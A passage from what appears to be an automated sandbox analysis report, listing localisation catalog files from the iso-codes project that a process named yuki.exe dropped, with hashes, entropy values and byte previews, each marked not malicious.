                                                                                                    Preview:........4........A......\....... .......!.......&.......-.......;.......I.......N.......S.......\.......d.......i.......q.......v............................................................................................................................................ .......&...............8.......M.......].......h.......t...........................................................................................................................................&...............4.......?.......G.......N.......W.......d.......r........................................................................................................................................-.......5.......F.......P.......W.......].......e.......l.......s.......{....................................................................................................................................*.......3.......;.......D.......K.......R.......b.......h.......p.......y.......................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\350\213\261\345\233\275\345\215\227\346\245\265\351\240\230\345\234\237'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2724
                                                                                                    Entropy (8bit):5.846765710516419
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADbdM3NvGqIfdvqNuoUau9HwWFEEWMgbtS1uF/go6F:qDEyBoHUwWh+bto5ou
                                                                                                    MD5:BEDA21072768FB3BBFA172E0980AA196
                                                                                                    SHA1:4D18E533C667D60CD9C1DE8A37B8C1EB654D2372
                                                                                                    SHA-256:7E187BFF34F1CDDDC58525446E1AB3294710F26C280A40E34C7C87246578E83F
                                                                                                    SHA-512:763094B3D708FD2536C7D096866798BF08F052BF3381FD104E70BA441CBEB139E84AFD9565CD8A8CB1A711330D571A8C1DEB490B54F7638E17DEED621377861B
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...........y...........#...$...6...2...[...'.......0...............$...............#...,...$...P...'...u...........$.......................$.........../.......<...!...[.......}...$...............................,...................:.......V...'...f................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 166 messages, Project-Id-Version: iso_4217 'ADB\345\213\230\345\256\232\345\215\230\344\275\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10051
                                                                                                    Entropy (8bit):5.313678073248342
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:TItbtfme0qVE4pls6dgjCnMLCkwILo+clMGzhnZiM+Z7bnjuU7NMkvKL9Cf:TIDmwVjpndgmn2DwIM/PnIM+BLiCukvp
                                                                                                    MD5:388AC76B9CE7D04408967D09FF30E7CA
                                                                                                    SHA1:A37880A70ACC132D4006851DD8E876AD55997A65
                                                                                                    SHA-256:3A93A0805A274B577B2FC6B245A92474C8BA3CC91490FDDD2ADC06346232D777
                                                                                                    SHA-512:862696D372BEEF347C99B890129823F142C9E2B3B5A156C25F60E56CE038F2786FEB2761AAD84AD739A571C8615C674ACE70E4A30905A1781AD076A65A7BD806
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|.......................................$.......3.......A.......O.......a.......q...........................................................1.......3.......9...<...7...v.......................................................................".......2.......H...0...U...............................................................................................................*......./.......E.......T.......f.......u.......z..............................................................................................................."...............>.......N.......^.......c.......h.......v.......}.......................................................................................................................!...............>.......Q.......W.......].......l.......{.......................................................................................#.......-.......>.......L.......\.......e.......t.......y.......................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 348 messages, Project-Id-Version: iso_639-3 '\343\202\242\343\203\226\343\203\217\343\202\270\343\202\242\350\252\236'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16790
                                                                                                    Entropy (8bit):5.101586919679552
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:WiKl/5ScVApJXuVhuCWrFMrsQiiByQ1vUmdGS2FwQlEv:WiKj+8ER7Bs
                                                                                                    MD5:E85BF0FA10668E5606671AE334873329
                                                                                                    SHA1:6BD880942CBA4777B3E020A40E21B585F070A2C8
                                                                                                    SHA-256:15959893F5FF54015781AAC3BD43A53D0837EB7361637CA787FEAFBE56CBE1AA
                                                                                                    SHA-512:3259CC5262EBCFAD6C2ECC5092FCB4207516709542B72C0350F82967B40D25DB312596075B148DA6D5DE1066677517A4F2B9ACEE9F48B0B50FD7AC65066E10E7
                                                                                                    Malicious:false
                                                                                                    Preview:........\.......................(.......).......3.......<.......B.......J.......O.......X.......b.......g.......p.......y.......................................................................................................................................................................!.......).......2.......8.......=.......E.......M.......R.......Y.......b.......l.......s.......{.......................................................................................................................................................(.......-.......3.......<.......B.......I.......P.......W.......`.......f.......m.......r.......x.......~................................................................................................................ ....... ....... ....... ....... ......$ ......- ......3 ......6 ......< ......A ......F ......O ......V ......a ......g ......q ......x ......~ ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 191 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8321
                                                                                                    Entropy (8bit):4.693846065185963
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:7YJP7qNGMPxR6NMt9S8NagudkPqpFHWses5:cP7SaNMt9HogudkPg2seo
                                                                                                    MD5:0F66F17B44716E68A3F8782C30732D7E
                                                                                                    SHA1:0F7EDF95254A8B0B1536C92DDA99CD412E8271BD
                                                                                                    SHA-256:BB0198F793CA41A361AD51F270542FC16D519B3C5AF7D474A39107FED25E8762
                                                                                                    SHA-512:0C1E0DD63CE8419DB6D614B30EF75EAC0FFD76364E328C15BC4C6B1578DF99CEC4EF64815094C2D1ACCE974729DF84AC83E4EE51BF9815722A7E44CD7CD94A5F
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................%.......-.......5.......<.......E.......Y.......c.......k.......q.......{.......................................................................................................................................*.......2.......;.......D.......K.......Z.......s.......x.......~.......................................................................................................................................'.......F.......K.......S.......Z.......h.......n.......v.......~.......................................................................................................................................................................%.......,.......7.......=.......F.......M.......X......._.......g.......o.......w.......}...............................................................................................................................................!.......,.......4.......?.......G.......O.......U.......[.......g.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 105 messages, Project-Id-Version: iso_15924 '\341\203\220\341\203\223\341\203\232\341\203\220\341\203\233\341\203\230'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6755
                                                                                                    Entropy (8bit):4.809964796804114
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Kc0+kjQ6OfuiHfheaoZ5Etny5g0stJKkWO3Ia4Lp7iGEFmpU8/SdI5rY:Kc0+kjQ6xiHpeaKetn6pstJK3npUB4Y
                                                                                                    MD5:6A17EFF061DE3221765F27EB7457E1D6
                                                                                                    SHA1:2A1D21CD95CBFCC7A79359997EBC2B8142B19882
                                                                                                    SHA-256:5FB11A0C43411B2140E6DE3ABACD09F4F05D4B7535BD3F2DDE88E33E85975342
                                                                                                    SHA-512:0EC57FE5EF567DDDA2CBAAB7621878B6A28E9680E59D65ED1CE0E81C175A4F74B48AB74BC7F48946878FD085F40A54A21921C3B9DA8D51C70D50150D20731F57
                                                                                                    Malicious:false
                                                                                                    Preview:........i.......d.......................................................#.......=.......F.......N.......W.......].......g.......m.......u.......................................................................................................................................................$.......*.......3.......<.......C.......J.......S.......d.......z...........................................................................#...........................................".......+.......2.......9.......B.......L.......W......._.......m.......~.......................................................................................................................!.......*.......5.......E.......K.......U.......`.......h.......u...................................................................................................................%...............................................*...........D...O...Z......................................................./.......K.......g...............
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\341\203\220\341\203\225\341\203\246\341\203\220\341\203\234\341\203\224\341\203\227\341\203\230'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36655
                                                                                                    Entropy (8bit):4.7742458545441675
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:0oCOBz48fmsWP48WAI6TYVmWlox0zer+ZEL20:bC6484TYVmWlox0zeSSa0
                                                                                                    MD5:A48E71CC3A1A0F849A1D9EE8E838134F
                                                                                                    SHA1:1B95D03C9C5A3342430F34DE2808BAF929C2CEC2
                                                                                                    SHA-256:6680ECCC467746851FD119A60BE64C58D174A4344D4DEC7996E72025D4C11587
                                                                                                    SHA-512:B5A0948100D8FED6C89B9BD6E2178CBCB17CDE51495B7293EAA8726855BA0BADB7AF1C9DAA5B65F45ACAB64461B48CADAC44FF72548283B5B6C8E8D334931535
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1942 messages, Project-Id-Version: iso_3166-2 '\341\203\220\341\203\221\341\203\224\341\203\240\341\203\223\341\203\230\341\203\234\341\203\250\341\203\230\341\203\240\341\203\230'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):111221
                                                                                                    Entropy (8bit):4.8857916225246765
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:BS/AMdiB/YuF8oflQ20SCnidXZxzOgzbLDFNvphDcXqpWyVKruEAun6b+kVC2RLv:wfQ7FJNQ20SCnidXZxzOgzbLDFNvphD1
                                                                                                    MD5:C3C0A91A9DD6A5B74C98F4440FD4360E
                                                                                                    SHA1:670175B6DCB93BA49F5E5A2532799ACDAB509A74
                                                                                                    SHA-256:48358F6D36510F2E9CC48E181067068827254E91B815C3547D918638B99040F3
                                                                                                    SHA-512:E33A06EBEC3F6A2D103957CED00AFFC4882785A9A0EF88F7D2940264BB954E1239654E8438C75A6A4A06CF747F834B619B10838AB9593952CCFFC915E6351E4C
                                                                                                    Malicious:false
                                                                                                    Preview:.................<......|y......................................................%.......+.......5.......:.......B.......H.......T.......Z.......d.......i.......x.......................................................................................................................................................&......./.......6.......;.......D.......J.......R.......Y.......e.......l.......s.......|...................................................................................................................#.......2.......:.......K.......U.......[.......b.......i.......q.......~.................................................................................................................................................%...............6.......>.......G.......O.......T.......].......h.......p.......w.......|................................................................................................................................$.......+.......4.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\341\203\221\341\203\240\341\203\230\341\203\242\341\203\220\341\203\234\341\203\224\341\203\227\341\203\230\341\203\241 \341\203\220\341\203\234\341\203\242\341\203\220\341\203\240\341\203\245\341\203\242\341\203\230\341\203\231\341\203\230\341\203\241 \341\203\242\341\203\224\341\203\240\341\203\230\341\203\242\341\203\235\341\203\240\341\203\230\341\203\220'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4426
                                                                                                    Entropy (8bit):4.95459264439643
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:rLvkuxC+yaCo+vmI0XE0xbdgb0N6nhq6KEVoz5LVO+RTAoLZlA:XoeFq90xbd/AnhVfVoz5LVO+BAoLZy
                                                                                                    MD5:254F092F3B7F849D751E16D66A927125
                                                                                                    SHA1:1B2A7E191B6C507BCC95CAEAB0E035AF79609214
                                                                                                    SHA-256:51277E37EB1B5BFCCD980B82FFECAF8AD29E9C702BF3E8E026350F12D43C9F0D
                                                                                                    SHA-512:96C2CD38568C9EA92AA9142FEF57BC21F6A9FD2455ECE8A7B6CD57832E1FF4DC7F1CC89A6D35169B4C6C1C4F801198024B607EDD0D6E81F4DD71A5042B183E46
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................\.......o...'...........Z...........u...........5.......1...S...=.......K..............._.......Q.......1...M...1.......@.......+.......%.......D...D...2.......;...............+...........7...........>...Z...`.......(.......m...#...........1............... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 173 messages, Project-Id-Version: iso_4217 '\341\203\220\341\203\225\341\203\246\341\203\220\341\203\234\341\203\243\341\203\240\341\203\230'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13229
                                                                                                    Entropy (8bit):4.791337133040459
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:lTnSKb0G/dz/Cj0cLo4zY8+KjTwst6C5i7YWjoTKtN0lGG:lTSKoAdzLcLo408+cTwy
                                                                                                    MD5:71FA8B38428D64596E242DBF0BA898D5
                                                                                                    SHA1:A60A6D11815531738524D101933836FE0FD78454
                                                                                                    SHA-256:DC434B7D44820BBF7720C5FCD224A4B57E2BA63E2177FCC3A24CC41087096092
                                                                                                    SHA-512:B6B0FABAA49E4C7DB9F0342337A8B160B02479150AC33BFE186B3FB4752693C662AB4C25C41BF5D06DC1242F2171D83CEE45AA9C2D1F207FFB8BBB2C0C342496
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................................................!.......1.......B.......P.......a.......k...1...}...3...................................................+.......5.......G.......W.......m.......z...............................................................................................................-.......2.......H.......W.......i.......x.......}...............................................................................................................&.......3.......?.......O......._.......o.......t.......y.......................................................................................................................................-...!...:.......\.......i.......y...............................................................................................,.......<.......D.......S.......].......d.......n.......................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_639-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):371
                                                                                                    Entropy (8bit):5.156056824864604
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijcYYxq7HCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITG9WWXmBQ8KMW0YEi9:i4cxxq7it02Ukx/iximCg5ITmvXmBQWk
                                                                                                    MD5:67B80B1B37164294FA03BC8692D9F6D8
                                                                                                    SHA1:213C59FC26A577778B3E697F62177100139017F7
                                                                                                    SHA-256:682E1D062677461BD3A46665C35CB66AE8AAEA48235A47BC00B9C86AA84FB1EE
                                                                                                    SHA-512:9B3789E98D8AC4A216903BD69821C246B21E85CE4E1995CBB8397F1EB3814EBDCFD7E5D846740D5B662EB0CE02F462C852C9A783E9D8DEBA67B8CB712A75C93E
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...9...9................Project-Id-Version: iso_639-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: ka.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 '\341\203\220\341\203\244\341\203\240\341\203\235-\341\203\220\341\203\226\341\203\230\341\203\243\341\203\240\341\203\230 \341\203\224\341\203\234\341\203\224\341\203\221\341\203\230'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11127
                                                                                                    Entropy (8bit):4.768490600288976
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDxPhLrBKq8SE0BfNcaoBNNN+NdN7NVNWNuNtNYNoN8NPNrNyNq3NqXNqvNq6Nd:XRhLrMqHE0BfNca6sMUpYLcuceUAKw4A
                                                                                                    MD5:A3E507C2C74987095D991E2C445F0E6F
                                                                                                    SHA1:8AD302327E6A216B0109461948E56799E105DE44
                                                                                                    SHA-256:F559BBE6791E96E0E5AC36E0C44B15038BBEC5E4EB0617B96D32A23E0674EE76
                                                                                                    SHA-512:522E82EA05EA8FEBEA7EBC149D3052ABF5ABD173047A3E16E34961BE6986D8443991595952BB8C303731087DB6C328C49636C0AE5B3283CB2F36AD700CADF1EE
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#......................................./.......4.......(...T...%...}...+...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_15924 'Ta\311\233rabt'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):571
                                                                                                    Entropy (8bit):5.32505887220515
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iTlEtxCfVt02UkPIB1/1Xiq2LLW/4vRXPXmBQWiOW+D:oeCVt0UPIf1XjX/EXmGq
                                                                                                    MD5:36B9A47493C6668197505F6CAE0C64B8
                                                                                                    SHA1:A48039AF208C5EA763A5E93B5E165DA7D82F4446
                                                                                                    SHA-256:590D385644A99418806F3C941B921D13051DD2277CF06F4CA3DD79232E52D93F
                                                                                                    SHA-512:1AC6BCEA1BA04DF6F29A32918D877A1FAEFD86F073175DB29D4B164CA67457A4F961A8AD55C19CC8FF60B1E450C463185DA53BC6126E0829F942F05C909F18DB
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q.......X.......2........................Arabic.Project-Id-Version: iso_15924.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2020-05-30 10:41+0000.Last-Translator: ButterflyOfFire <ButterflyOfFire@protonmail.com>.Language-Team: Kabyle <https://hosted.weblate.org/projects/iso-codes/iso-15924/kab/>.Language: kab.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 4.1-dev..Ta.rabt.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 144 messages, Project-Id-Version: iso_3166-1 'Af\311\243anistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6371
                                                                                                    Entropy (8bit):4.760705654684784
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:bEIHtWNAY/Me8yngkJL4kEfMrD7W6+zZ/4uRVbx9yMkC+/ghDuH/l:bzarxguskRDSrzZ/4ox48+IhDGl
                                                                                                    MD5:4BD8AB0902EE5E76EFE26CAF6CCBAF75
                                                                                                    SHA1:6BA8BE35714C405A9E1B7C62016A037DE767A793
                                                                                                    SHA-256:C25C2F78E03B32D1FB3677DDA6932F91EFA88B3BF51EAD0464BB45C96BB8CEAE
                                                                                                    SHA-512:F5A230FB83B3437FB125BE591E21AC1D842B340684EBCDE38D72C92ADF82215060A3344CCA2E160AF34D7A3039E20E7874B37425242DB667FE55CE2934DF4D72
                                                                                                    Malicious:false
                                                                                                    Preview:................................ .......!.......-.......5.......=.......E.......L.......U.......i.......s.......{...............................................................................................................................................#.......+.......4.......;.......T.......Y......._.......h.......p.......{...............................................................................................................................................................&.......-.......;.......D.......L.......R.......\.......a.......................................................................................................................................................................".......-.......4.......<.......C.......K.......V.......^.......f.......r.......~...............................................................................................................................5.......=.......D... ...Z.......{...............................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 16 messages, Project-Id-Version: iso_3166-2 'Lezzayer'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1099
                                                                                                    Entropy (8bit):5.177719607723013
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2DaKhXSyimnTqhtihzUCiSt0UT1yr/aXmGQSHQ:Qa0SyimTqczUCi/URyfzSw
                                                                                                    MD5:A98228E841B32DA2D6E134BECEF57246
                                                                                                    SHA1:360CBCF32083B75B248B911256156659E61B4C07
                                                                                                    SHA-256:459D9AA1715597DC34987E3ED6EDB3AC4FDA560B6E3558CB85C14C36DFF189BB
                                                                                                    SHA-512:8CE81460B8AC8A001E5A74D17E8EDE45658FA8FA2D4D32AB5A00CCFF81A921EF54FD9734AEB0E0C3B70AD2665339933B09F8719B0117E770C018E0CE5784ABE2
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...............................................................................................................................................................................................................$.......+.......2.......9.......D................................................................................................Alger.Annaba.Bouira.B.ja.a.Chlef.Constantine.Djelfa.Illizi.Laghouat.Oran.Ouargla.Sa.da.S.tif.Tizi Ouzou.T.bessa.Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2024-01-10 05:06+0000.Last-Translator: ButterflyOfFire <boffire@users.noreply.hosted.weblate.org>.Language-Team: Kabyle <https://hosted.weblate.org/projects/iso-codes/iso-3166-2/kab/>.Language: kab.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 5.4-dev..Lezzayer..ennaba.Tu
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7 messages, Project-Id-Version: iso_4217 'Adinar azzayri'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):830
                                                                                                    Entropy (8bit):5.218572717457691
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i26vsBtRsisCh/MVEMTlALxRt02UkPIB1/1Xiq2LLW/4XQXPXmBQWiOWaKnDkk:mvmZ/Wl8Pt0UPIf1XjX/6WXmGtx
                                                                                                    MD5:946217B1934BA3AB9FFF7AAE9AC4EA78
                                                                                                    SHA1:5D05EC877DA757823D655BCB798C03FC03E770BF
                                                                                                    SHA-256:584028829E4C8000D5BE22F26634FAE0585692220FAC258082A5EE6B4D31B484
                                                                                                    SHA-512:4E9E33EEED02B56ED3A402CFBA9598853292CC1BB15B8B32554EEBA011F2C07E4FED9E987E36CE889F9D94A71C63F23B6F470A8577BC3FF2845CCF78AF04C246
                                                                                                    Malicious:false
                                                                                                    Preview:................T............................................................................................................... .......0................................................Algerian Dinar.Iraqi Dinar.Kuwaiti Dinar.Libyan Dinar.Serbian Dinar.Tunisian Dinar.Project-Id-Version: iso_4217.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2020-05-30 10:41+0000.Last-Translator: ButterflyOfFire <ButterflyOfFire@protonmail.com>.Language-Team: Kabyle <https://hosted.weblate.org/projects/iso-codes/iso-4217/kab/>.Language: kab.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 4.1-dev..Adinar azzayri.Adinar a.iraqi.Adinar akuweyti.Adinar alibi.Adinar a.irbi.Adinar atunsi.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 12 messages, Project-Id-Version: iso_639-3 'Tabxazit'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):979
                                                                                                    Entropy (8bit):5.168205214139948
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:8wlbbUDmLrsx+udEVt0UKWg7/2MXmGC8lN:zHwxJEMUKJ7+NRAN
                                                                                                    MD5:59DC866BB16955994701DC7FA68B8BBF
                                                                                                    SHA1:EB65E907605E75F815811CBEE5FA0165D904211F
                                                                                                    SHA-256:264028F523333EB24573E3EEAEA510EA46EF3F09716F5F7168DCF16D03A07FDB
                                                                                                    SHA-512:C59D48959219A759FD8E198C39D9EA3C25B3E9D2F4B3099836384003E224609DBE439A2854D5A1FEB6AD4724B7BC2EE9083D83A72BAFDD3EFE62F5839644B2B9
                                                                                                    Malicious:false
                                                                                                    Preview:................|............... .......!.......+.......0.......:.......?.......G.......N.......W.......^.......v.......}...............].......f.......n.......y................................................................................................................................Abkhazian.Afar.Afrikaans.Akan.Amharic.Arabic.Assamese.Avaric.Central Atlas Tamazight.French.Kabyle.Project-Id-Version: iso_639-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2020-10-17 03:27+0000.Last-Translator: Hakim Oubouali <hakim.oubouali.skr@gmail.com>.Language-Team: Kabyle <https://hosted.weblate.org/projects/iso-codes/iso-639-3/kab/>.Language: kab.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 4.3.1-dev..Tabxazit.Tafarit.Tafrikanst.Takanit.Tamharikt.Ta.rabt.Tasamizt.Tavarikt.Tamazi.t n ume..uk.Tafransist.Taqbaylit.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_639-5
                                                                                                    Category:dropped
                                                                                                    Size (bytes):372
                                                                                                    Entropy (8bit):5.161051593620953
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijn1YYxqZCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITG9PXmBQ8KMW0YEi9:i4n1xxq8t02Ukx/iximCg5ITmPXmBQWk
                                                                                                    MD5:DDAD72FDDFC5C9ABDEECFCC202887191
                                                                                                    SHA1:5CB104DF518A211CDF775071489277EDC8D6BA14
                                                                                                    SHA-256:5C976A8B58DDAB3C9EAC46A8D5214138E51EFD4660B73E7C46C8739369AED848
                                                                                                    SHA-512:BC87648B8978A1BEFCC81C8CDE8E69E500E41ABA4A22FDA0FE5D0DC346EBFFA0BDF1509BBA865C966BCCE799A2EE39ADFAF19DC25A7E9447BDC73A72B3029AD1
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...:...9................Project-Id-Version: iso_639-5.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: kab.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 115 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5119
                                                                                                    Entropy (8bit):4.675355836426427
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:WPJbohDUKdH8Y2302+WG4h+yB4dTgE6ctK997yMqe0gEgSyDkiu:WBbo2y8Yd2Z3hWdT/Lt8GO0/gNRu
                                                                                                    MD5:B7C9721711B3109805EAE93924722680
                                                                                                    SHA1:BD9FFB9B86394C83E55CA69418EA89B9005CDBF7
                                                                                                    SHA-256:996232268819CC37A14F060A9B15CAF1B769764DA1971EE99035F446DF45064B
                                                                                                    SHA-512:229526BA518981880187D9E124472E53012DCF0F84BF2D0DF63E2400D146FB01EB81F63E855279065CF19B8415F9379C498BB8ADF4E87DF69BE0E31FBE0DEBF6
                                                                                                    Malicious:false
                                                                                                    Preview:........s...............L.......................................................................................................$.......+.......3.......J.......S.......Z.......g.......o.......x...............................................................................................................................................#.......+.......1.......8.......?.......F.......L.......V.......^.......d.......n.......s.......z.......................................................................................................................................................................&...............6.......<.......H.......N.......V.......].......b.......k.......r............................................................................................................... .......(.......5.......A.......K.......Q.......X.......c.......l.......u.......................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 423 messages, Project-Id-Version: iso_3166-1 '\320\220\321\203\322\223\320\260\320\275\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29652
                                                                                                    Entropy (8bit):5.321734535072368
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:nakI2pMbgtmsWP4XWAIRZOnKstRYpxC/WlYAv3CrAd07GYOZryRMLbrK3Wt6lHkN:n3MUsZOBtRYpxC/WlYy3CrAi7GNZWsfn
                                                                                                    MD5:7A9371DD0BF9AA523527B78C609D7AF2
                                                                                                    SHA1:92BF71C5119B76C92259D497DBD2E08A4E71F23E
                                                                                                    SHA-256:E5FE6240B7C455F90738B6D0D162BE68907C9CC3AE187C5A4008E6F597B9A1F5
                                                                                                    SHA-512:68649E4A75226886AE4F48045FA5DD027724CF137C91242B7CDC39F2A1FF833FDD2E514097065232EA9654D54AA91214929E4EE0125C8301AE1CD3047B3EA250
                                                                                                    Malicious:false
